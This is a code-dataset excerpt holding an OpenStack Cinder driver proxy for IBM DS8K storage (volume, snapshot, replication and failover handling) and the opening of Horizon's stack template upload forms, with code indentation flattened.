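# Hypothetical caller sketch: build a single certificate bundle, hand its path
# to an HTTPS client as the CA bundle, then remove the temporary file.
collector = CertificateCollector(paths=['/opt/custom/certs'])  # extra path is made up
bundle_path = collector.collect_certificate()
try:
    if bundle_path:
        # e.g. pass bundle_path as the CA bundle (verify=bundle_path) to the
        # REST client; the client call itself is out of scope here.
        pass
finally:
    collector.free_certificate()
```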
#### File: ibm/ibm_storage/ds8k_proxy.py
```python
import ast
import json
import six
from oslo_config import cfg
from oslo_log import log as logging
from cinder import exception
from cinder.i18n import _, _LI, _LW, _LE
from cinder.objects import fields
from cinder.utils import synchronized
import cinder.volume.drivers.ibm.ibm_storage as storage
from cinder.volume.drivers.ibm.ibm_storage import ds8k_helper as helper
from cinder.volume.drivers.ibm.ibm_storage \
import ds8k_replication as replication
from cinder.volume.drivers.ibm.ibm_storage import ds8k_restclient as restclient
from cinder.volume.drivers.ibm.ibm_storage import proxy
from cinder.volume.drivers.ibm.ibm_storage import strings
from cinder.volume import group_types
from cinder.volume import volume_types
LOG = logging.getLogger(__name__)
VALID_OS400_VOLUME_TYPES = {
'A01': 8, 'A02': 17, 'A04': 66,
'A05': 33, 'A06': 132, 'A07': 263,
'A81': 8, 'A82': 17, 'A84': 66,
'A85': 33, 'A86': 132, 'A87': 263,
'050': '', '099': ''
}
EXTRA_SPECS_DEFAULTS = {
'thin': True,
'replication_enabled': False,
'consistency': False,
'os400': '',
'consistent_group_replication_enabled': False,
'group_replication_enabled': False,
'consistent_group_snapshot_enabled': False,
}
ds8k_opts = [
cfg.StrOpt(
'ds8k_devadd_unitadd_mapping',
default='',
help='Mapping between IODevice address and unit address.'),
cfg.StrOpt(
'ds8k_ssid_prefix',
default='FF',
help='Set the first two digits of SSID'),
cfg.StrOpt(
'ds8k_host_type',
default='auto',
help='Set to zLinux if your OpenStack version is prior to '
'Liberty and you\'re connecting to zLinux systems. '
'Otherwise set to auto. Valid values for this parameter '
'are: %s.' % six.text_type(helper.VALID_HOST_TYPES)[1:-1])
]
CONF = cfg.CONF
CONF.register_opts(ds8k_opts)
class Lun(object):
"""provide volume information for driver from volume db object."""
class FakeLun(object):
def __init__(self, lun, **overrides):
self.size = lun.size
self.os_id = 'fake_os_id'
self.cinder_name = lun.cinder_name
self.is_snapshot = lun.is_snapshot
self.ds_name = lun.ds_name
self.ds_id = None
self.type_thin = lun.type_thin
self.type_os400 = lun.type_os400
self.data_type = lun.data_type
self.type_replication = lun.type_replication
if not self.is_snapshot and self.type_replication:
self.replica_ds_name = lun.replica_ds_name
self.replication_driver_data = lun.replication_driver_data
self.replication_status = lun.replication_status
self.lss_pair = lun.lss_pair
def update_volume(self, lun):
volume_update = lun.get_volume_update()
volume_update['provider_location'] = six.text_type({
'vol_hex_id': self.ds_id})
volume_update['metadata']['vol_hex_id'] = self.ds_id
return volume_update
def __init__(self, volume, is_snapshot=False):
volume_type_id = volume.get('volume_type_id')
self.specs = volume_types.get_volume_type_extra_specs(
volume_type_id) if volume_type_id else {}
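# Hypothetical extra-specs example: {'drivers:thin_provision': 'True',
# 'drivers:os400': '050', 'replication_enabled': '<is> True'}.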
os400 = self.specs.get(
'drivers:os400', EXTRA_SPECS_DEFAULTS['os400']
).strip().upper()
self.type_thin = self.specs.get(
'drivers:thin_provision', '%s' % EXTRA_SPECS_DEFAULTS['thin']
).upper() == 'True'.upper()
self.type_replication = self.specs.get(
'replication_enabled',
'<is> %s' % EXTRA_SPECS_DEFAULTS['replication_enabled']
).upper() == strings.METADATA_IS_TRUE
if volume.provider_location:
provider_location = ast.literal_eval(volume.provider_location)
self.ds_id = provider_location[six.text_type('vol_hex_id')]
else:
self.ds_id = None
self.cinder_name = volume.display_name
self.lss_pair = {}
self.is_snapshot = is_snapshot
if self.is_snapshot:
self.size = volume.volume_size
# ds8k supports at most 16 chars
self.ds_name = (
"OS%s:%s" % ('snap', helper.filter_alnum(self.cinder_name))
)[:16]
else:
self.size = volume.size
self.ds_name = (
"OS%s:%s" % ('vol', helper.filter_alnum(self.cinder_name))
)[:16]
self.replica_ds_name = (
"OS%s:%s" % ('Replica', helper.filter_alnum(self.cinder_name))
)[:16]
self.replication_status = volume.replication_status
self.replication_driver_data = (
json.loads(volume.replication_driver_data)
if volume.replication_driver_data else {})
if self.replication_driver_data:
# Only one replication target is supported for now.
replication_target = sorted(
self.replication_driver_data.values())[0]
replica_id = replication_target[six.text_type('vol_hex_id')]
self.lss_pair = {
'source': (None, self.ds_id[0:2]),
'target': (None, replica_id[0:2])
}
if os400:
if os400 not in VALID_OS400_VOLUME_TYPES.keys():
msg = (_("The OS400 volume type provided, %s, is not "
"a valid volume type.") % os400)
raise restclient.APIException(data=msg)
self.type_os400 = os400
if os400 not in ['050', '099']:
self.size = VALID_OS400_VOLUME_TYPES[os400]
else:
self.type_os400 = EXTRA_SPECS_DEFAULTS['os400']
self.data_type = self._create_datatype(self.type_os400)
self.os_id = volume.id
self.status = volume.status
self.volume = volume
def _get_volume_metadata(self, volume):
if 'volume_metadata' in volume:
metadata = volume.volume_metadata
return {m['key']: m['value'] for m in metadata}
if 'metadata' in volume:
return volume.metadata
return {}
def _get_snapshot_metadata(self, snapshot):
if 'snapshot_metadata' in snapshot:
metadata = snapshot.snapshot_metadata
return {m['key']: m['value'] for m in metadata}
if 'metadata' in snapshot:
return snapshot.metadata
return {}
def shallow_copy(self, **overrides):
return Lun.FakeLun(self, **overrides)
def _create_datatype(self, t):
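# Examples: 'A02' -> 'A02 FB 520P', 'A82' -> 'A82 FB 520U',
# '050' -> '050 FB 520UV', '099' -> '099 FB 520PV'.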
if t[0:2] == 'A0':
datatype = t + ' FB 520P'
elif t[0:2] == 'A8':
datatype = t + ' FB 520U'
elif t == '050':
datatype = t + ' FB 520UV'
elif t == '099':
datatype = t + ' FB 520PV'
else:
datatype = None
return datatype
# Note: updating metadata in volume-related functions deletes all prior metadata.
def get_volume_update(self):
volume_update = {}
volume_update['provider_location'] = six.text_type(
{'vol_hex_id': self.ds_id})
# update metadata
if self.is_snapshot:
metadata = self._get_snapshot_metadata(self.volume)
else:
metadata = self._get_volume_metadata(self.volume)
if self.type_replication:
metadata['replication'] = six.text_type(
self.replication_driver_data)
else:
metadata.pop('replication', None)
volume_update['replication_driver_data'] = json.dumps(
self.replication_driver_data)
volume_update['replication_status'] = self.replication_status
metadata['data_type'] = (self.data_type if self.data_type else
metadata['data_type'])
metadata['vol_hex_id'] = self.ds_id
volume_update['metadata'] = metadata
# need to update volume size for OS400
if self.type_os400:
volume_update['size'] = self.size
return volume_update
class Group(object):
"""provide group information for driver from group db object."""
def __init__(self, group):
gid = group.get('group_type_id')
specs = group_types.get_group_type_specs(gid) if gid else {}
self.type_cg_snapshot = specs.get(
'consistent_group_snapshot_enabled', '<is> %s' %
EXTRA_SPECS_DEFAULTS['consistent_group_snapshot_enabled']
).upper() == strings.METADATA_IS_TRUE
class DS8KProxy(proxy.IBMStorageProxy):
prefix = "[IBM DS8K STORAGE]:"
def __init__(self, storage_info, logger, exception, driver,
active_backend_id=None, HTTPConnectorObject=None):
proxy.IBMStorageProxy.__init__(
self, storage_info, logger, exception, driver, active_backend_id)
self._helper = None
self._replication = None
self._connector_obj = HTTPConnectorObject
self._replication_enabled = False
self._active_backend_id = active_backend_id
self.configuration = driver.configuration
self.configuration.append_config_values(ds8k_opts)
@proxy._trace_time
def setup(self, ctxt):
LOG.info(_LI("Initiating connection to IBM DS8K storage system."))
connection_type = self.configuration.safe_get('connection_type')
replication_devices = self.configuration.safe_get('replication_device')
if connection_type == storage.XIV_CONNECTION_TYPE_FC:
if not replication_devices:
self._helper = helper.DS8KCommonHelper(self.configuration,
self._connector_obj)
else:
self._helper = (
helper.DS8KReplicationSourceHelper(self.configuration,
self._connector_obj))
elif connection_type == storage.XIV_CONNECTION_TYPE_FC_ECKD:
self._helper = helper.DS8KECKDHelper(self.configuration,
self._connector_obj)
else:
err = (_("Param [connection_type] %s is invalid.")
% connection_type)
raise exception.InvalidParameterValue(err=err)
if replication_devices:
self._do_replication_setup(replication_devices, self._helper)
@proxy.logger
def _do_replication_setup(self, devices, src_helper):
if len(devices) >= 2:
err = _("Param [replication_device] is invalid, Driver "
"support only one replication target.")
raise exception.InvalidParameterValue(err=err)
self._replication = replication.Replication(src_helper, devices[0])
self._replication.check_physical_links()
self._replication.check_connection_type()
if self._active_backend_id:
self._switch_backend_connection(self._active_backend_id)
self._replication_enabled = True
@proxy.logger
def _switch_backend_connection(self, backend_id, repl_luns=None):
repl_luns = self._replication.switch_source_and_target(backend_id,
repl_luns)
self._helper = self._replication._source_helper
return repl_luns
@staticmethod
def _b2gb(b):
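# Whole GiB via floor division, e.g. _b2gb(2 ** 31) == 2.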
return b // (2 ** 30)
@proxy._trace_time
def _update_stats(self):
if self._helper:
storage_pools = self._helper.get_pools()
if not len(storage_pools):
msg = _('No pools found - make sure san_clustername '
'is defined in the config file and that the '
'pools exist on the storage.')
LOG.error(msg)
raise exception.CinderException(message=msg)
else:
msg = (_('Backend %s is not initialized.')
% self.configuration.volume_backend_name)
raise exception.CinderException(data=msg)
stats = {
"volume_backend_name": self.configuration.volume_backend_name,
"serial_number": self._helper.backend['storage_unit'],
"extent_pools": self._helper.backend['pools_str'],
"vendor_name": 'IBM',
"driver_version": self.full_version,
"storage_protocol": self._helper.get_connection_type(),
"total_capacity_gb": self._b2gb(
sum(p['cap'] for p in storage_pools.values())),
"free_capacity_gb": self._b2gb(
sum(p['capavail'] for p in storage_pools.values())),
"reserved_percentage": self.configuration.reserved_percentage,
"consistencygroup_support": True,
"consistent_group_snapshot_enabled": True,
"multiattach": False
}
if self._replication_enabled:
stats['replication_enabled'] = self._replication_enabled
self.meta['stat'] = stats
def _assert(self, assert_condition, exception_message=''):
if not assert_condition:
LOG.error(exception_message)
raise restclient.APIException(data=exception_message)
@proxy.logger
def _create_lun_helper(self, lun, pool=None, find_new_pid=True):
# DS8K supports ECKD ESE volume from 8.1
connection_type = self._helper.get_connection_type()
if connection_type == storage.XIV_CONNECTION_TYPE_FC_ECKD:
thin_provision = self._helper.get_thin_provision()
if lun.type_thin and thin_provision:
if lun.type_replication:
msg = _("The primary or the secondary storage "
"can not support ECKD ESE volume.")
else:
msg = _("Backend can not support ECKD ESE volume.")
LOG.error(msg)
raise restclient.APIException(message=msg)
# There is a time gap between finding an available LSS slot and
# the LUN actually occupying it, so retry if the LSS fills up.
excluded_lss = []
while True:
try:
if lun.type_replication and not lun.is_snapshot:
lun.lss_pair = self._replication.find_available_lss_pair(
excluded_lss)
else:
lun.lss_pair['source'] = self._helper.find_available_lss(
pool, find_new_pid, excluded_lss)
return self._helper.create_lun(lun)
except restclient.LssFullException:
msg = _LW("LSS %s is full, find another one.")
LOG.warning(msg, lun.lss_pair['source'][1])
excluded_lss.append(lun.lss_pair['source'][1])
@proxy.logger
def _clone_lun(self, src_lun, tgt_lun):
self._assert(src_lun.size <= tgt_lun.size,
_('Target volume should be bigger or equal '
'to the Source volume in size.'))
self._ensure_vol_not_fc_target(src_lun.ds_id)
# The volume IDs of src_lun and tgt_lun will be the same if tgt_lun is an
# image volume, because _clone_image_volume in manager.py does not pop
# the provider_location.
if (tgt_lun.ds_id is None) or (src_lun.ds_id == tgt_lun.ds_id):
# It is a preferred practice to locate the FlashCopy target
# volume on the same DS8000 server as the FlashCopy source volume.
pool = self._helper.get_pool(src_lun.ds_id[0:2])
# FlashCopy to a larger target only works with thick volumes, so we
# emulate it for thin volumes by extending the target after the copy.
if tgt_lun.type_thin and tgt_lun.size > src_lun.size:
tmp_size = tgt_lun.size
tgt_lun.size = src_lun.size
self._create_lun_helper(tgt_lun, pool)
tgt_lun.size = tmp_size
else:
self._create_lun_helper(tgt_lun, pool)
else:
self._assert(
src_lun.size == tgt_lun.size,
_('When target volume is pre-created, it must be equal '
'in size to source volume.'))
finished = False
try:
vol_pairs = [{
"source_volume": src_lun.ds_id,
"target_volume": tgt_lun.ds_id
}]
self._helper.start_flashcopy(vol_pairs)
fc_finished = self._helper.wait_flashcopy_finished(
[src_lun], [tgt_lun])
if (fc_finished and
tgt_lun.type_thin and
tgt_lun.size > src_lun.size):
param = {
'cap': self._helper._gb2b(tgt_lun.size),
'captype': 'bytes'
}
self._helper.change_lun(tgt_lun.ds_id, param)
finished = fc_finished
finally:
if not finished:
self._helper.delete_lun(tgt_lun)
return tgt_lun
def _ensure_vol_not_fc_target(self, vol_hex_id):
for cp in self._helper.get_flashcopy(vol_hex_id):
if cp['targetvolume']['id'] == vol_hex_id:
msg = (_('Volume %s is currently a target of another '
'FlashCopy operation') % vol_hex_id)
raise restclient.APIException(data=msg)
@proxy._trace_time
def create_volume(self, volume):
lun = self._create_lun_helper(Lun(volume))
if lun.type_replication:
lun = self._replication.create_replica(lun)
return lun.get_volume_update()
@proxy._trace_time
def create_cloned_volume(self, target_vol, source_vol):
lun = self._clone_lun(Lun(source_vol), Lun(target_vol))
if lun.type_replication:
lun = self._replication.create_replica(lun)
return lun.get_volume_update()
@proxy._trace_time
def create_volume_from_snapshot(self, volume, snapshot):
lun = self._clone_lun(Lun(snapshot, is_snapshot=True), Lun(volume))
if lun.type_replication:
lun = self._replication.create_replica(lun)
return lun.get_volume_update()
@proxy._trace_time
def extend_volume(self, volume, new_size):
lun = Lun(volume)
param = {
'cap': self._helper._gb2b(new_size),
'captype': 'bytes'
}
if lun.type_replication:
if not self._active_backend_id:
self._replication.delete_pprc_pairs(lun)
self._helper.change_lun(lun.ds_id, param)
self._replication.extend_replica(lun, param)
self._replication.create_pprc_pairs(lun)
else:
msg = (_("The volume %s has been failed over, it is "
"not suggested to extend it.") % lun.ds_id)
raise exception.CinderException(data=msg)
else:
self._helper.change_lun(lun.ds_id, param)
@proxy._trace_time
def volume_exists(self, volume):
return self._helper.lun_exists(Lun(volume).ds_id)
@proxy._trace_time
def delete_volume(self, volume):
lun = Lun(volume)
if lun.type_replication:
lun = self._replication.delete_replica(lun)
self._helper.delete_lun(lun)
@proxy._trace_time
def create_snapshot(self, snapshot):
return self._clone_lun(Lun(snapshot['volume']), Lun(
snapshot, is_snapshot=True)).get_volume_update()
@proxy._trace_time
def delete_snapshot(self, snapshot):
self._helper.delete_lun(Lun(snapshot, is_snapshot=True))
@proxy._trace_time
def migrate_volume(self, ctxt, volume, backend):
# This and retype are a complete mess, pending cinder changes for a fix.
# Currently this only handles migrating between pools on the same
# physical machine but different cinder.conf backends.
# A volume is not allowed to get here if it is in a CG or replicated.
# Should probably check volume['status'] in ['available', 'in-use'],
# especially for FlashCopy.
stats = self.meta['stat']
if backend['capabilities']['vendor_name'] != stats['vendor_name']:
raise exception.VolumeDriverException(_(
'source and destination vendors differ.'))
if backend['capabilities']['serial_number'] != stats['serial_number']:
raise exception.VolumeDriverException(_(
'source and destination serial numbers differ.'))
new_pools = self._helper.get_pools(
backend['capabilities']['extent_pools'])
lun = Lun(volume)
cur_pool_id = self._helper.get_lun(lun.ds_id)['pool']['id']
cur_node = self._helper.get_storage_pools()[cur_pool_id]['node']
# try pools in same rank
for pid, pool in new_pools.items():
if pool['node'] == cur_node:
try:
self._helper.change_lun(lun.ds_id, {'pool': pid})
return (True, None)
except Exception:
pass
# try pools in opposite rank
for pid, pool in new_pools.items():
if pool['node'] != cur_node:
try:
new_lun = lun.shallow_copy()
self._create_lun_helper(new_lun, pid, False)
lun.data_type = new_lun.data_type
self._clone_lun(lun, new_lun)
volume_update = new_lun.update_volume(lun)
try:
self._helper.delete_lun(lun)
except Exception:
pass
return (True, volume_update)
except Exception:
# Ignore a missing ds_id if volume creation failed.
self._helper.delete_lun(new_lun)
return (False, None)
@proxy._trace_time
def retype(self, ctxt, volume, new_type, diff, host):
"""retype the volume.
:param ctxt: Context
:param volume: A dictionary describing the volume to migrate
:param new_type: A dictionary describing the volume type to convert to
:param diff: A dictionary with the difference between the two types
:param host: A dictionary describing the host to migrate to, where
host['host'] is its name, and host['capabilities'] is a
dictionary of its reported capabilities.
"""
def _get_volume_type(key, value):
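# Hypothetical diff example: {'extra_specs': {'drivers:thin_provision':
# ('True', 'False')}} yields (old_type, new_type) == (True, False).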
extra_specs = diff.get('extra_specs')
specific_type = extra_specs.get(key) if extra_specs else None
if specific_type:
old_type = (True if str(specific_type[0]).upper() == value
else False)
new_type = (True if str(specific_type[1]).upper() == value
else False)
else:
old_type = None
new_type = None
return old_type, new_type
def _convert_thin_and_thick(lun, new_type):
new_lun = lun.shallow_copy()
new_lun.type_thin = new_type
self._create_lun_helper(new_lun)
self._clone_lun(lun, new_lun)
try:
self._helper.delete_lun(lun)
except Exception:
pass
lun.ds_id = new_lun.ds_id
lun.data_type = new_lun.data_type
lun.type_thin = new_type
return lun
lun = Lun(volume)
# check thin or thick
old_type_thin, new_type_thin = _get_volume_type(
'drivers:thin_provision', 'True'.upper())
# check replication capability
old_type_replication, new_type_replication = _get_volume_type(
'replication_enabled', strings.METADATA_IS_TRUE)
# start retype
if old_type_thin != new_type_thin:
if old_type_replication:
if not new_type_replication:
lun = self._replication.delete_replica(lun)
lun = _convert_thin_and_thick(lun, new_type_thin)
else:
msg = (_("The volume %s is in replication relationship, "
"it is not supported to retype from thin to "
"thick or vice versus.") % lun.ds_id)
raise exception.CinderException(msg)
else:
lun = _convert_thin_and_thick(lun, new_type_thin)
if new_type_replication:
lun.type_replication = True
lun = self._replication.enable_replication(lun)
else:
if not old_type_replication and new_type_replication:
lun.type_replication = True
lun = self._replication.enable_replication(lun)
elif old_type_replication and not new_type_replication:
lun = self._replication.delete_replica(lun)
lun.type_replication = False
return True, lun.get_volume_update()
@synchronized('OpenStackCinderIBMDS8KMutexConnect-', external=True)
@proxy._trace_time
@proxy.logger
def initialize_connection(self, volume, connector, **kwargs):
"""Attach a volume to the host."""
vol_id = Lun(volume).ds_id
LOG.info(_LI('Attach the volume %s.'), vol_id)
return self._helper.initialize_connection(vol_id, connector, **kwargs)
@synchronized('OpenStackCinderIBMDS8KMutexConnect-', external=True)
@proxy._trace_time
@proxy.logger
def terminate_connection(self, volume, connector, force=False, **kwargs):
"""Detach a volume from a host."""
vol_id = Lun(volume).ds_id
LOG.info(_LI('Detach the volume %s.'), vol_id)
return self._helper.terminate_connection(vol_id, connector,
force, **kwargs)
@proxy.logger
def create_consistencygroup(self, ctxt, group):
"""Create a consistency group."""
return self._helper.create_group(ctxt, group)
@proxy.logger
def delete_consistencygroup(self, ctxt, group, volumes):
"""Delete a consistency group."""
luns = [Lun(volume) for volume in volumes]
return self._helper.delete_group(ctxt, group, luns)
@proxy._trace_time
def create_cgsnapshot(self, ctxt, cgsnapshot, snapshots):
"""Create a consistency group snapshot."""
return self._create_group_snapshot(ctxt, cgsnapshot, snapshots, True)
def _create_group_snapshot(self, ctxt, cgsnapshot, snapshots,
cg_enabled=False):
snapshots_model_update = []
model_update = {'status': fields.GroupStatus.AVAILABLE}
src_luns = [Lun(snapshot['volume']) for snapshot in snapshots]
tgt_luns = [Lun(snapshot, is_snapshot=True) for snapshot in snapshots]
try:
if src_luns and tgt_luns:
self._clone_group(src_luns, tgt_luns, cg_enabled)
except restclient.APIException:
model_update['status'] = fields.GroupStatus.ERROR
LOG.exception(_LE('Failed to create group snapshot.'))
for tgt_lun in tgt_luns:
snapshot_model_update = tgt_lun.get_volume_update()
snapshot_model_update.update({
'id': tgt_lun.os_id,
'status': model_update['status']
})
snapshots_model_update.append(snapshot_model_update)
return model_update, snapshots_model_update
@proxy._trace_time
@proxy.logger
def delete_cgsnapshot(self, ctxt, cgsnapshot, snapshots):
"""Delete a consistency group snapshot."""
return self._delete_group_snapshot(ctxt, cgsnapshot, snapshots)
def _delete_group_snapshot(self, ctxt, group_snapshot, snapshots):
snapshots_model_update = []
model_update = {'status': fields.GroupStatus.DELETED}
snapshots = [Lun(s, is_snapshot=True) for s in snapshots]
if snapshots:
try:
self._helper.delete_lun(snapshots)
except restclient.APIException as e:
model_update['status'] = fields.GroupStatus.ERROR_DELETING
LOG.error(_LE("Failed to delete group snapshot. "
"Error: %(err)s"),
{'err': e})
for snapshot in snapshots:
snapshots_model_update.append({
'id': snapshot.os_id,
'status': model_update['status']
})
return model_update, snapshots_model_update
@proxy.logger
def update_consistencygroup(self, ctxt, group,
add_volumes, remove_volumes):
"""Add or remove volume(s) to/from an existing consistency group."""
return self._helper.update_group(ctxt, group,
add_volumes, remove_volumes)
@proxy._trace_time
def create_consistencygroup_from_src(self, ctxt, group, volumes,
cgsnapshot, snapshots,
source_cg, sorted_source_vols):
"""Create a consistencygroup from source.
:param ctxt: the context of the caller.
:param group: the dictionary of the consistency group to be created.
:param volumes: a list of volume dictionaries in the group.
:param cgsnapshot: the dictionary of the cgsnapshot as source.
:param snapshots: a list of snapshot dictionaries in the cgsnapshot.
:param source_cg: the dictionary of the consisgroup as source.
:param sorted_source_vols: a list of volume dictionaries
in the consisgroup.
:return model_update, volumes_model_update
"""
return self._create_group_from_src(ctxt, group, volumes, cgsnapshot,
snapshots, source_cg,
sorted_source_vols, True)
def _create_group_from_src(self, ctxt, group, volumes, cgsnapshot,
snapshots, source_cg, sorted_source_vols,
cg_enabled=False):
model_update = {'status': fields.GroupStatus.AVAILABLE}
volumes_model_update = []
if cgsnapshot and snapshots:
src_luns = [Lun(snapshot, is_snapshot=True)
for snapshot in snapshots]
elif source_cg and sorted_source_vols:
src_luns = [Lun(source_vol)
for source_vol in sorted_source_vols]
else:
msg = _("_create_group_from_src supports a group snapshot "
"source or a group source, other sources can not "
"be used.")
LOG.error(msg)
raise exception.InvalidInput(message=msg)
try:
tgt_luns = [Lun(volume) for volume in volumes]
if src_luns and tgt_luns:
self._clone_group(src_luns, tgt_luns, cg_enabled)
except restclient.APIException:
model_update['status'] = fields.GroupStatus.ERROR
msg = _LE("Failed to create group from group snapshot.")
LOG.exception(msg)
for tgt_lun in tgt_luns:
volume_model_update = tgt_lun.get_volume_update()
volume_model_update.update({
'id': tgt_lun.os_id,
'status': model_update['status']
})
volumes_model_update.append(volume_model_update)
return model_update, volumes_model_update
def _clone_group(self, src_luns, tgt_luns, cg_enabled):
for src_lun in src_luns:
self._ensure_vol_not_fc_target(src_lun.ds_id)
finished = False
try:
vol_pairs = []
for src_lun, tgt_lun in zip(src_luns, tgt_luns):
pool = self._helper.get_pool(src_lun.ds_id[0:2])
if tgt_lun.ds_id is None:
self._create_lun_helper(tgt_lun, pool)
vol_pairs.append({
"source_volume": src_lun.ds_id,
"target_volume": tgt_lun.ds_id
})
if cg_enabled:
self._do_flashcopy_with_freeze(vol_pairs)
else:
self._helper.start_flashcopy(vol_pairs)
finished = self._helper.wait_flashcopy_finished(src_luns, tgt_luns)
finally:
if not finished:
self._helper.delete_lun(tgt_luns)
@synchronized('OpenStackCinderIBMDS8KMutex-CG-', external=True)
@proxy._trace_time
def _do_flashcopy_with_freeze(self, vol_pairs):
# issue flashcopy with freeze
self._helper.start_flashcopy(vol_pairs, True)
# unfreeze the LSS where source volumes are in
lss_ids = list(set(p['source_volume'][0:2] for p in vol_pairs))
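        # Illustrative note (example values assumed, not from the original
        # driver): the first two characters of each source volume id are
        # taken as its LSS, so a pair such as {'source_volume': '2100', ...}
        # would contribute '21' to lss_ids above.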
LOG.debug('Unfreezing the LSS: %s', ','.join(lss_ids))
self._helper.unfreeze_lss(lss_ids)
@proxy.logger
def create_group(self, ctxt, group):
"""Create generic volume group."""
return self._helper.create_group(ctxt, group)
@proxy.logger
def delete_group(self, ctxt, group, volumes):
"""Delete group and the volumes in the group."""
luns = [Lun(volume) for volume in volumes]
return self._helper.delete_group(ctxt, group, luns)
@proxy.logger
def update_group(self, ctxt, group, add_volumes, remove_volumes):
"""Update generic volume group."""
return self._helper.update_group(ctxt, group,
add_volumes, remove_volumes)
@proxy.logger
def create_group_snapshot(self, ctxt, group_snapshot, snapshots):
"""Create volume group snapshot."""
snapshot_group = Group(group_snapshot)
cg_enabled = True if snapshot_group.type_cg_snapshot else False
return self._create_group_snapshot(ctxt, group_snapshot,
snapshots, cg_enabled)
@proxy.logger
def delete_group_snapshot(self, ctxt, group_snapshot, snapshots):
"""Delete volume group snapshot."""
return self._delete_group_snapshot(ctxt, group_snapshot, snapshots)
@proxy._trace_time
def create_group_from_src(self, ctxt, group, volumes, group_snapshot,
sorted_snapshots, source_group,
sorted_source_vols):
"""Create volume group from volume group or volume group snapshot."""
volume_group = Group(group)
cg_enabled = True if volume_group.type_cg_snapshot else False
return self._create_group_from_src(ctxt, group, volumes,
group_snapshot, sorted_snapshots,
source_group, sorted_source_vols,
cg_enabled)
def freeze_backend(self, ctxt):
"""Notify the backend that it's frozen."""
pass
def thaw_backend(self, ctxt):
"""Notify the backend that it's unfrozen/thawed."""
pass
@proxy.logger
@proxy._trace_time
def failover_host(self, ctxt, volumes, secondary_id):
"""Fail over the volume back and forth.
        If secondary_id is 'default', volumes will be failed back;
        otherwise they will be failed over.
"""
volume_update_list = []
if secondary_id == strings.PRIMARY_BACKEND_ID:
if not self._active_backend_id:
msg = _LI("Host has been failed back. doesn't need "
"to fail back again.")
LOG.info(msg)
return self._active_backend_id, volume_update_list
else:
if self._active_backend_id:
msg = _LI("Host has been failed over to %s.")
LOG.info(msg, self._active_backend_id)
return self._active_backend_id, volume_update_list
backend_id = self._replication._target_helper.backend['id']
if secondary_id is None:
secondary_id = backend_id
elif secondary_id != backend_id:
msg = (_('Invalid secondary_backend_id specified. '
'Valid backend id is %s.') % backend_id)
raise exception.InvalidReplicationTarget(message=msg)
LOG.debug("Starting failover to %s.", secondary_id)
replicated_luns = []
for volume in volumes:
lun = Lun(volume)
if lun.type_replication and lun.status == "available":
replicated_luns.append(lun)
else:
volume_update = (
self._replication.failover_unreplicated_volume(lun))
volume_update_list.append(volume_update)
if replicated_luns:
try:
if secondary_id != strings.PRIMARY_BACKEND_ID:
self._replication.do_pprc_failover(replicated_luns,
secondary_id)
self._active_backend_id = secondary_id
replicated_luns = self._switch_backend_connection(
secondary_id, replicated_luns)
else:
self._replication.start_pprc_failback(
replicated_luns, self._active_backend_id)
self._active_backend_id = ""
self._helper = self._replication._source_helper
except restclient.APIException as e:
msg = (_("Unable to failover host to %(id)s. "
"Exception= %(ex)s")
% {'id': secondary_id, 'ex': six.text_type(e)})
raise exception.UnableToFailOver(reason=msg)
for lun in replicated_luns:
volume_update = lun.get_volume_update()
volume_update['replication_status'] = (
'failed-over' if self._active_backend_id else 'enabled')
model_update = {'volume_id': lun.os_id,
'updates': volume_update}
volume_update_list.append(model_update)
else:
LOG.info(_LI("No volume has replication capability."))
if secondary_id != strings.PRIMARY_BACKEND_ID:
LOG.info(_LI("Switch to the target %s"), secondary_id)
self._switch_backend_connection(secondary_id)
self._active_backend_id = secondary_id
else:
LOG.info(_LI("Switch to the primary %s"), secondary_id)
self._switch_backend_connection(self._active_backend_id)
self._active_backend_id = ""
return secondary_id, volume_update_list
``` |
{
"source": "2020human/horizon",
"score": 2
} |
#### File: project/stacks/forms.py
```python
import json
import logging
import django
from django.conf import settings
from django.utils import html
from django.utils.translation import ugettext_lazy as _
from django.views.decorators.debug import sensitive_variables # noqa
from oslo_utils import strutils
import six
from horizon import exceptions
from horizon import forms
from horizon import messages
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.images \
import utils as image_utils
from openstack_dashboard.dashboards.project.instances \
import utils as instance_utils
LOG = logging.getLogger(__name__)
def create_upload_form_attributes(prefix, input_type, name):
"""Creates attribute dicts for the switchable upload form
:type prefix: str
:param prefix: prefix (environment, template) of field
:type input_type: str
:param input_type: field type (file, raw, url)
:type name: str
:param name: translated text label to display to user
:rtype: dict
:return: an attribute set to pass to form build
"""
attributes = {'class': 'switched', 'data-switch-on': prefix + 'source'}
attributes['data-' + prefix + 'source-' + input_type] = name
return attributes
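# Illustrative example (not part of the original module): calling
# create_upload_form_attributes('template', 'file', 'Template File') is
# expected to return
#     {'class': 'switched',
#      'data-switch-on': 'templatesource',
#      'data-templatesource-file': 'Template File'}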
class TemplateForm(forms.SelfHandlingForm):
class Meta(object):
name = _('Select Template')
help_text = _('Select a template to launch a stack.')
# TODO(jomara) - update URL choice for template & environment files
# w/ client side download when applicable
base_choices = [('file', _('File')),
('raw', _('Direct Input'))]
url_choice = [('url', _('URL'))]
attributes = {'class': 'switchable', 'data-slug': 'templatesource'}
template_source = forms.ChoiceField(label=_('Template Source'),
choices=base_choices + url_choice,
widget=forms.Select(attrs=attributes))
attributes = create_upload_form_attributes(
'template',
'file',
_('Template File'))
template_upload = forms.FileField(
label=_('Template File'),
help_text=_('A local template to upload.'),
widget=forms.FileInput(attrs=attributes),
required=False)
attributes = create_upload_form_attributes(
'template',
'url',
_('Template URL'))
template_url = forms.URLField(
label=_('Template URL'),
help_text=_('An external (HTTP) URL to load the template from.'),
widget=forms.TextInput(attrs=attributes),
required=False)
attributes = create_upload_form_attributes(
'template',
'raw',
_('Template Data'))
template_data = forms.CharField(
label=_('Template Data'),
help_text=_('The raw contents of the template.'),
widget=forms.widgets.Textarea(attrs=attributes),
required=False)
attributes = {'data-slug': 'envsource', 'class': 'switchable'}
environment_source = forms.ChoiceField(
label=_('Environment Source'),
choices=base_choices,
widget=forms.Select(attrs=attributes),
required=False)
attributes = create_upload_form_attributes(
'env',
'file',
_('Environment File'))
environment_upload = forms.FileField(
label=_('Environment File'),
help_text=_('A local environment to upload.'),
widget=forms.FileInput(attrs=attributes),
required=False)
attributes = create_upload_form_attributes(
'env',
'raw',
_('Environment Data'))
environment_data = forms.CharField(
label=_('Environment Data'),
help_text=_('The raw contents of the environment file.'),
widget=forms.widgets.Textarea(attrs=attributes),
required=False)
if django.VERSION >= (1, 9):
        # Note(Itxaka): On django>=1.9 CharField has a strip option that
        # we need to set to False so as not to hit
